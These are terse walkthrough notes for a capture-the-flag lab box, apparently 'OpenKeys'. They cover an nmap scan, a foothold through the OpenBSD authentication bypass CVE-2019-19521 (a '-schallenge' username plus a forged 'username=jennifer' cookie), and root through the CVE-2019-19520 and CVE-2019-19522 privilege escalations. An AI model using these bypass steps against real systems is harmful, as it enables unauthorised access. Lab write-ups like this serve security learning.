Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 10:01 EDT
Nmap scan report for openkeys.htb (10.10.10.199)
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.1 (protocol 2.0)
| ssh-hostkey: 
|   3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA)
|   256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA)
|_  256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519)
80/tcp open  http    OpenBSD httpd
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 692.70 seconds

################################################################################
FOOTHOLD
################################################################################

O - /include has a .swp file, use vim -r .swp
  - jennifer@openkeys.htb
  - /var/www/htdocs/includes/auth.php
  - ../auth_helpers
    - http://openkeys.htb/auth_helpers/check_auth is an ELF, chmod and use it
        with auth.php to test
  O - cve-2019-1952
  O - https://www.qualys.com/2019/12/04/cve-2019-19521/authentication-vulnerabilities-openbsd.txt
      X = ssh -v -F /dev/null -o PreferredAuthentications=keyboard-interactive \
            -o KbdInteractiveDevices=bsdauth -l -sresponse:passwd 192.168.56.121
    O - '-schallenge:passwd' => capture BURP => add cookie "username=jennifer"
        - chmod 400 ~/.ssh/id_rsa
        - ssh -i key target

################################################################################
ROOT
################################################################################
CVE-2019-19520: Local privilege escalation via xlock
  - can copy/paste
CVE-2019-19522: Local privilege escalation via S/Key and YubiKey
  - The above CVE descripts at attack where you echo soemthing into
      /etc/skey/root. you cannot copy/paste this. the file createad cannot
      be on a single line. read the man pages for skey and notice they must
      be on separate lines. the final line doesnt/didnt need to have a \n.
